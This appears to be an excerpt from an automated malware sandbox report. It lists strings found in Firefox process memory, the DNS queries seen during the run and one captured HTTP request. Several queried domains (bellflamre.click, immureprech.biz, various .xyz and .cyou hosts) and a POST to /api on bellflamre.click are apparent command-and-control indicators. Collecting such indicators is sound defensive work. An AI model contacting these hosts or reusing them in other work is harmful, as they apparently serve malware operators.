Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2631935554.000001324CB84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2631935554.000001324CB84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.2631935554.000001324CB84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2710270016.0000198D55400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: resource://devtools/shared/security/socket.jsUnable to start devtools server on JSON Viewer's onSave failed in startPersistence@mozilla.org/dom/slow-script-debug;1No callback set for this channel.^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?devtools/client/framework/devtools-browser@mozilla.org/network/protocol;1?name=defaultdevtools.debugger.remote-websocketdevtools/client/framework/devtoolsdevtools.performance.popup.feature-flagGot invalid request to save JSON dataFailed to execute WebChannel callback:WebChannel/this._originCheckCallbackDevToolsStartup.jsm:handleDebuggerFlagresource://devtools/server/devtools-server.js{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}@mozilla.org/network/protocol;1?name=fileDevTools telemetry entry point failed: @mozilla.org/uriloader/handler-service;1Failed to listen. Callback argument missing.browser.fixup.dns_first_for_single_words^([a-z+.-]+:\/{0,3})([^\/@]+@).+releaseDistinctSystemPrincipalLoaderFailed to listen. Listener already attached.^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]\|$)devtools.performance.recording.ui-base-urlbrowser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPbrowser.urlbar.dnsResolveFullyQualifiedNamesget FIXUP_FLAGS_MAKE_ALTERNATE_URIget FIXUP_FLAG_FORCE_ALTERNATE_URIhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/network/async-stream-copier;1Can't invoke URIFixup in the content processhttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol<http://poczta.interia.pl/mh/?mailto=%s_injectDefaultProtocolHandlersIfNeededhandlerSvc fillHandlerInfo: don't know this typehttp://www.inbox.lv/rfc2368/?value=%sgecko.handlerService.defaultHandlersVersionhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s{33d75835-722f-42c0-89cc-44f328e56a86}@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/FileUtils.sys.mjsresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsisDownloadsImprovementsAlreadyMigratedresource://gre/modules/NetUtil.sys.mjs@mozilla.org/network/file-input-stream;1{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/JSONFile.sys.mjshttps://poczta.interia.pl/mh/?mailto=%shttps://mail.inbox.lv/compose?to=%shttps://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/uriloader/web-handler-app;1_finalizeInternal/this._finalizePromise<resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjsScheme should be either http or https@mozilla.org/intl/converter-input-stream;1@mozilla.org/scriptableinputstream;1https://mail.inbox.lv/compose?to=%shttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLMust have a source and a callbackhttps://mail.yahoo.co.jp/compose/?To=%sVALIDATE_DONT_COLLAPSE_WHITESPACEhttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?ma
Source: firefox.exe, 00000017.00000002.2655457741.000001324EC60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2655457741.000001324ECFE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2655457741.000001324EC06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2710270016.0000198D55400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000036.00000003.2924322126.0000028719B5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2965795523.0000028719B5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2653502406.000001324DED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2655457741.000001324ECC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249356000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000017.00000002.2622599068.0000013249356000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: bellflamre.click
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz
Source: global traffic	DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic	DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic	DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic	DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic	DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bellflamre.click

Source: firefox.exe, 00000017.00000002.2614640392.000001323D16B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621608217.0000013248F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000017.00000002.2662138541.000001324F3DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3004156489.000002871C807000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2662138541.000001324F3DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2659715643.000001324F124000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000036.00000003.2956524928.0000028719ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_REQUEST_BODY_SENTBLOCKING_REASON_CORS
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000036.00000003.2956444225.0000028719AE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerUseOfReleaseEventsWarningUse
Source: firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000017.00000002.2620149903.0000013248926000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000017.00000002.2620149903.0000013248961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times$
Source: firefox.exe, 00000017.00000002.2620149903.0000013248926000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000017.00000002.2620149903.0000013248961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000017.00000002.2620149903.0000013248926000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000017.00000002.2614640392.000001323D103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/stringsX
Source: firefox.exe, 00000017.00000002.2627287813.000001324A741000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2641964443.000001324D4D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2631935554.000001324CB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254ED6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649608370.000001324D983000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D8E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2635766369.000001324D091000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D837000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2646286201.000001324D503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2687133291.00000132503E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2634205159.000001324CD50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2708011983.00000132567E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2664047201.000001324F455000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2674958419.0000013250291000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2634205159.000001324CD08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2687133291.0000013250333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254EB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649608370.000001324D920000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2783589649.00000287123AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2959075905.00000287196B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621608217.0000013248F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s_injectDefaultProtocolHandlersIfNeededhandlerSvc
Source: firefox.exe, 00000017.00000002.2701121751.0000013254EC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2674958419.0000013250291000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000017.00000002.2701121751.0000013254EC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2674958419.0000013250291000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
